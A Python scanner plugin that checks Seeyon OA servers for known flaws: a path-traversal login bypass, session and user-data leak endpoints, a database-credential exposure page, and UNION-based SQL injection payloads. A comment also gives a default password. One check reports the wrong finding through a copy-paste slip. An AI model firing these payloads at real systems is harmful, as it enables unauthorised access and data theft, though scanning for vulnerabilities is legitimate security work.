#!/usr/bin python
from plugins.config.config_package import *

header={
	    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
	    "Content-Type": "application/x-www-form-urlencoded",
	}

class Seeyoncheck(object):
    def ajax(url):
        path='seeyon/thirdpartyController.do.css/..;/ajax.do'
        res = core.get(url,path)
        if 'java.lang.NullPointerException:null' in res.text:
            core.checksuc(target=url,name='Seeyon ajax.do登录绕过&任意文件上传',payload='seeyon/thirdpartyController.do.css/..;/ajax.do')
        else:
            pass

    def get_sessionlist(url):
        path='yyoa/ext/https/getSessionList.jsp?cmd=getAll'
        res = core.get(url,path)
        if res.status_code==200 and  "<sessionID>" in res.text:
            soup=BeautifulSoup(res.text,'lxml')
            sessions=soup.find_all('sessionid')
            core.checksuc(target=url,name='Seeyon getSessionList.jsp session泄露',payload='yyoa/ext/https/getSessionList.jsp?cmd=getAl')
            #print("[+] 共有{}个session，第一个为：JSESSIONID={}\n".format(len(sessions)+1,sessions[0].string.strip('\n\r')))
        else:
            pass

    def htmlofficeservlet(url):
        path = 'seeyon/htmlofficeservlet'
        res = core.get(url,path)
        if res.status_code == 200 and  "htmoffice" in res.text:
            core.checksuc(target=url,name='Seeyon htmlofficeservlet',payload='seeyon/htmlofficeservlet')
        else:
            pass
    
    def createMysql(url):
        try:
            path1 = 'yyoa/createMysql.jsp'
            path2 = 'yyoa/ext/createMysql.jsp'
            res1 = requests.get(url + path1,headers=header,verify=False,timeout=2)
            res2 = requests.get(url + path2,headers=header,verify=False,timeout=2)
            if res1.status_code == 200 or res2.status_code == 200:
                if 'root' in res1.text or 'root' in res2.text:
                    core.checksuc(target=url,name='Seeyon createMysql 信息泄露',payload='yyoa/createMysql.jsp')
            else:
                pass
        except Exception as e:
            pass
        except KeyboardInterrupt:
            sys.exit()

    def DownExcelBeanServlet(url):
        path = 'yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0'
        name = 'Seeyon DownExcelBeanServlet 用户敏感信息泄露'
        payload = '{}yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0'.format(url)
        res = core.get(url,path)
        if res.status_code == 200 and 'xls' in str(res.headers).lower():
            core.checksuc(target=url,name='Seeyon createMysql 信息泄露',payload='yyoa/createMysql.jsp')
        else:
            pass
    
    def initDataAssess(url):
        path = 'yyoa/assess/js/initDataAssess.jsp'
        res = core.get(url,path)
        if res.status_code == 200 and 'personList' in res.text:
            core.checksuc(target=url,name='Seeyon initDataAssess.jsp 用户敏感信息泄露',payload='yyoa/assess/js/initDataAssess.jsp')
        else:
            pass

    def status(url):
        path = 'seeyon/management/status.jsp'
        res = core.get(url,path)
        if res.status_code == 200 and 'Password' in res.text:
            #默认密码：WLCCYBD@SEEYON 敏感路径:/seeyon/logs/login.log	/seeyon/logs/v3x.log'
            core.checksuc(target=url,name='Seeyon A8 状态监控页面信息泄露',payload='seeyon/management/status.jsp')
        else:
            pass

    def test_jsp_sqli(url):
        path = 'yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20@@basedir)'
        res = core.get(url,path)
        if res.status_code == 200 and '@@basedir' in res.text:
            core.checksuc(target=url,name='Seeyon A6 test.jsp SQL注入漏洞',payload='yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20@@basedir)')
        else:
            pass

    def setextno_sqli(url):
        path = 'yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(99999) union all select 1,2,(SELECT%20@@basedir),4#'
        res = core.get(url,path)
        if res.status_code == 200 and '@@basedir' in res.text:
            core.checksuc(target=url,name='Seeyon A6 setextno.jsp SQL注入漏洞',payload='yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(99999) union all select 1,2,(SELECT%20@@basedir),4#')
        else:
            pass
        
    def resendjsp_sqli(url):
        path = 'yyoa/ext/trafaxserver/SendFax/resend.jsp?fax_ids=(1)%20and%201=2%20union%20select%20user()%20--'
        res = core.get(url,path)
        if res.status_code == 200 and 'java.sql.SQLException' in res.text:
            core.checksuc(target=url,name='Seeyon A6 resend.jsp SQL注入漏洞',payload='yyoa/ext/trafaxserver/SendFax/resend.jsp?fax_ids=(1)%20and%201=2%20union%20select%20user()%20--')
        else:
            pass